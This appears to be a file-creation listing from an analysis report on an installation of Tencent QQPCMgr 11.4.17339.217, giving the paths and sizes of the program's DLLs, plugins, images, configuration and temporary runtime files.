%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\DownloaderMgrUI.png (309 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\config\CategoryConfig.xml (31 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\qmsxtboxplugin.png (822 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\sqlite.dll (6069 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUL.dll (4721 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\adfilterlib\tsadlibforce.xml (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAdFilter.rdb (180 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\FtSysCommonMgrGF.dat (480 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\FIFAConfig.etf (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMArpHelperDll.dll (1958 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\oDayProtect.dll (374 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSVulFilter.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1604.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSkinMgr.dll (3189 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\AdfilterExtension.sext (177 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\DeskUpdate\GlobalMgr.db (190 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMDns.dll (1439 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMMobileTrayPlugin\QMMobileTrayPlugin.tpc (698 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\PhoneMgrConfig.etf (322 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1010.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCFileOpen.rdb (105 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMHardwareDetectPlugin\Config\harddiskmark.etf (48 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMClinicTrayPlugin\QMClinicTrayPlugin.tpc (701 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\More.png (448 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\Scc.dll (5756 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\data\autoinstall.etf (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\MobileSoftMgr.dll (1042 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1074.dat (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\MalWare.dll (4960 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMMobileSettingCenter\QMMobileSettingCenter.dll (1973 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMClinicsettingcenter\QMClinicSettingCenter.tpc (747 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\RtpPage\RtpPage.png (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\CheckAv.etf (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\config\NetworkFixInfo.xml (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1231.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_131.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAVPedc.dll (1288 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPScannerPlugin\QMHPGarbageScan\HPGarbageScannerConf.xml (83 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMIpc.dll (1329 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMBJTrayPlugin\QMBJTrayPlugin.dll (4325 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1603.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPScannerPlugin\HPExternalScan\HPFirewareScanner.dll (1868 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\adfilterlib\tsadlibblackac.xml (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCExternal.exe (1171 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMTrayPlugin.xml (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1500.dat (6 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmrtpplugin\QMRtpPlugin.rdb (255 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\FileSmash\tinyxml.dll (662 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1346.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAssocScan.dll (4867 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TxArp5.inf (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\smanalyplugin\SMAnalyPlugin.dll (7213 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSSO\Bin\SSOPlatform.dll (14138 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_691.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1406.dat (969 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMTPIEStartPage\QMTPIEStartPage.dll (6797 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\BrowserInfo.etf (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCClinicSys\QQPCClinicSys.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMQQLoginPlugin\QMQQLoginPlugin.rdb (159 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetflowOpti\QMNetflowOptiDll.dll (56 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftGroup.etf (85 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAOServicePlugin.etf (545 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetSpeedTest\NetSpeedTest.png (3 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\WechatBackup\UserIco\Circle57.png (852 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\CubeSwitch.etf (935 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMHardwareDetectPlugin\Config\videocardmark.etf (17 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMTrojanPlugin\QMTrojanPlugin.tpc (690 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAOWorkFlowMgr.dll (4029 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMSccTrayPlugin\QMSccTrayPlugin.dll (3470 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1407.dat (1 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\AdBlock\adconfig.dat (6 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\GFCustom.dll (6693 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUAgent.dll (2405 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1383.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\NodisturbSGList.etf (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMTrojanScan\QMTrojanScan.tpc (688 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1403.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\IEStartPage\supplyID.xml (266 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\NodisturbOVList.etf (411 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.CRT\msvcr80.dll (7024 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\sysspeedupjmp\SysSpeedUpJmp.dll (895 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\virdex01.def (131 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\HWPlugin.png (565 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\IEStartPage\IEStartPage.tpc (707 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_133.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ProcInfo.etf (92 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMWebFWCtrl\QMWebFWCtrl.dll (17297 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\IEStartPage\searchlist.dat (990 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.CRT\8.0.50727.4053.cat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMGameUpgradePlugin\QMGameUpgradePlugin.rdb (137 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_889.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_10001.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMDLP.dat (688 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\tinyxml.dll (1847 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\tpkreport.dll (3761 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1230.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1028.dat (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAccountProtection.dat (696 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\XYConfig.etf (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\StartupMgr\Deopt.etf (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_115.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGameSpeedup.exe (7044 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmupdatemodule\QMUpdateModule.dll (2786 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftPolicy.etf (286 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\StartupMgr\Startup.etf (1826 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1201.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMSCGeneralPlugin\QMSCGeneralPlugin.rdb (53 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMDL.exe (2860 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMAutoTaskPlugin\QMAutoTaskPlugin.dll (8386 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMEmMat.dat (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCMgrCmdline.xml (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\qmspeedupplugin\speeduprocket\SpeedupRocket.tpc (721 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\Image\TPBackImage.png (43 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QQPCSoftMgr.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1755.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\AddMore.png (172 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1009.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\tsmscj.DAT (500 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAdBlock.exe (5289 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1105.dat (453 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSoftCmd.exe (3181 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\qqpcweiyundiskjmp.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1601.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCWifiSafe\libexpatw.dll (1185 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\BlueList.lis (28 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QuickOpenLogo\QQPCClinic_QO.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\smanalyplugin\SMAnalyPlugin.tpc (707 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCmgrInstallGuide.dat (720 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftTrayTips.ini (17 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1220.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPScannerPlugin\hpiestartpagescan\HPIEStartPageScan.dll (396 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1007.dat (503 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1034.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\config\DNSHookDomainList2.0.xml (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMGameUpgradePlugin\QMGameUpgradePlugin.dll (3521 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSysRepLib.dat (6386 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\DNFConfig.etf (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmavtrayplugin\QMShield32.png (578 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_298.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMAutoTaskPlugin\SubRdbs\speedupmsg.rdb (151 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAOBusinessCfg.etf (270 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_2.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TVL00001.tvl (6372 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\Images\softmgr_notify.ico (289 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\HPScanUIPlugin\HPScanUIPlugin.rdb (6186 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_10.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\AppLaunch.prf (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSoftMgr.rdb (308 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameFilter.etf (9 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMEmMat.dll (2129 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\BugReportRule.dat (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QMNetMobileFlux.png (989 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1016.dat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAccountProtection.rdb (3755 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMDlder.dll (1387 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMRepairPlugin.dll (1862 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSoftConfig.exe (6588 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1073.dat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1400.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1602.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1891.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMGamePackagePlugin\QMGamePackagePlugin.rdb (31 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMAutoTaskPlugin\SubPlugins\GameSpeedupExposure.dll (4872 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QuickOpenInfo.xml (202 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMRouterMgr.dat (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\qmsoftmgrupdate\QMSoftMgrUpdate.dll (3585 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1018.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\virsrc00.def (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMPersonalCenter.dat (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysSpeedUp\SysSpeedUp.rdb (68 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMHardwareDetectPlugin\Config\cpumark.etf (32 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPScannerPlugin\QMHPGarbageScan\QMHPGarbageScan.dll (2367 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysOptimize\SysOptimize.dll (765 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCRTP.exe (3900 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_87.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGuide.rdb (273 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMRouterLogic.dll (6398 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\dr.dll (1718 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTraceClearDll.dll (5871 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SpeedupPlugins.etf (796 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMSysOptimizeAssist\QMSysOptimizeAssist.tpc (715 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGameAssistant.rdb (16 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCCommonMgr.rdb (15370 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\Images\MyPhone.ico (292 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1106.dat (453 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\WebFireWallForRtp.dat (998 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMExtInstaller.dll (4490 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\CommonCallback.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMHardwareDetectPlugin\QMHardwareDetectPlugin.tpc (716 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\Win10Tips.png (940 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQBrowserWebInstaller.exe (2115 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\macband.txt (35 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\TraceClear\TraceClear.dll (3547 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\QQPCNetFlow.exe (8042 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGameAppPluginInfo.xml (969 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1011.dat (1 bytes)
C:\$ConvertToNonresident (3120 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\libexpatw.dll (2489 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1436.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\config\SupportDomain.xml (283 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPScannerPlugin\hpswscanplugin\HPSWScanPlugin.dll (3769 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMHwFloatWnd\QMHwFloatWnd.rdb (130 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCHwNetwork.dll (1361 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMProtect.dll (1640 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\jgImage.dll (45 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\config\NetRepairPage.js (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMGameAcceleratePlugin\QMGameAcceleratePlugin.rdb (228 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMHIPSHeart.dll (4428 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMSysOptimizeAssist\QMProcessRunningTime.dll (1259 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\FileLinkRepair.etf (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\MenuManager.png (789 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPScannerPlugin\hptrojanscan\HPTrojanScanInfo.xml (62 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\qqpclaunch.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMLDPatch.dll (339 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\TSVulFw_Cache\jsfeature.xml (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAVCache.dll (4782 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\PackageUpdate.dat (1834 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMSCVulPlugin\QMSCVulPlugin.tpc (707 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCRepair.rdb (37 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\sqlite.dll (6117 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QMNetConnect.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCClinic.dat (720 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftVerInfo.etf (33 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMRouterMgr.exe (5140 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMNewsTips\QMNewsTips.rdb (22 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\FileSmash\libpng.dll (1127 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\WechatBackup.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSysOptimize.rdb (255 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSoftGame.dat (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMDeskTopGC.exe (5958 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAOBusinessCfgV2.etf (601 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\CFConfig.etf (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAdBlock.rdb (1704 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\FileSmash\Common.dll (17235 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMTrojanScan\QMinfo.xml (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\sm01.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCClinicHelper.exe (74 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\StartupMgr\SoftMon.etf (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_771.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\QQPCCommonMgr.rdb (15253 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMFileMon.dll (7662 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMTrayDetector\QMTrayDetector.dll (2318 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.ATL\Microsoft.VC80.ATL.Manifest (466 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSRunner.DAT (717 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\communic.dll (878 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.CRT\msvcm80.dll (4106 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ptrate.dll (1845 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMChExt.exe (3555 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMContextScan.dll (1928 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\GameUpgradeTrayPlugin\GameUpgradeTrayPlugin.dll (3218 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_660.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TxArp5_m.inf (940 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\AGEConfig.etf (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMHardwareDetectPlugin\Config\GameHardwareInfo.etf (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysHomePage\HomePageRecommendItems.xml (652 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\CommonDef.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\QMInsys.sys (1312 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSUrlLib.DAT (15 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_10483.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmavtrayplugin\QMShield128.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\adfilterlib\tsadlibwhiteac.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.ATL\Microsoft.VC80.ATL.cat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\Images\logodef.ico (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1033.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\arkGraphic.dll (4546 bytes)
